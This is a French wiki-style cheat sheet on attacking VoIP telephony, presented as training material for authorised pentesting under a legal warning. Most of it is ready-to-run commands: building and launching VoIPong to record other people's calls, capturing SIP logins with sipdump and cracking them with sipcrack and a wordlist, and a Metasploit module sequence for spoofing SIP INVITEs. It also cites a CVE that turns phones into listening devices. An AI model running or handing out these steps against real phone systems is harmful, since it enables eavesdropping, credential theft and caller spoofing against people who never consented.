Attaque VoIP
🔒 Contenu de sécurité — usage encadré
Cette page décrit des techniques de sécurité offensive à des fins exclusivement pédagogiques et professionnelles (formation, préparation de certification, montée en compétence défensive).
Ces techniques ne doivent être mises en œuvre que dans un laboratoire isolé ou sur un système pour lequel vous disposez d'une autorisation écrite explicite du propriétaire. Les employer contre un système tiers sans autorisation est une infraction pénale (art. 323-1 et suivants du Code pénal). Voir les avertissements généraux.
| Fiche express | |
|---|---|
| Domaine | Attaque réseau — téléphonie sur IP |
| Écoute | VoIPong |
| Crack | sipcrack |
| Voir aussi | Hijacking · Metasploit |
Cette fiche regroupe des techniques d'attaque de la VoIP : écoute de conversations, crack d'authentification SIP et abus de Metasploit.
- Pentest VoIP (BackTrack) : http://www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP
- http://hackingvoip.com
Écoute avec VoIPong
VoIPong permet d'écouter des conversations ; il nécessite les dépendances libpcap et sox.
tar -xvvf voipong-2.0.tar.gz
cd voipong-2.0
cp Makefile.linux Makefile
make && make install
# configuration : ajuster le chemin de sox
vi /usr/local/etc/voipong/voipong.conf
# lancement
./voipong -f
Les conversations sont enregistrées dans le répertoire output. L'utilitaire voipctl gère le logiciel.
Crack de ligne SIP
apt-get install sipcrack
# capturer une authentification
sipdump -i eth0 capturevoip
# cracker le mot de passe
sipcrack capturevoip -w dico.txt
La vulnérabilité CVE-2007-4498 permet de transformer certains téléphones en micro-espion.
Metasploit et téléphones SIP
msfconsole
use auxiliary/voip/sip_invite_spoof
show options
set DOMAIN 15261@sip.exemple.tld
set SRCADDR 203.0.113.10
set RHOSTS 203.0.113.10/24
run
Voir aussi
- Hijacking — vol de session
- Metasploit — framework d'exploitation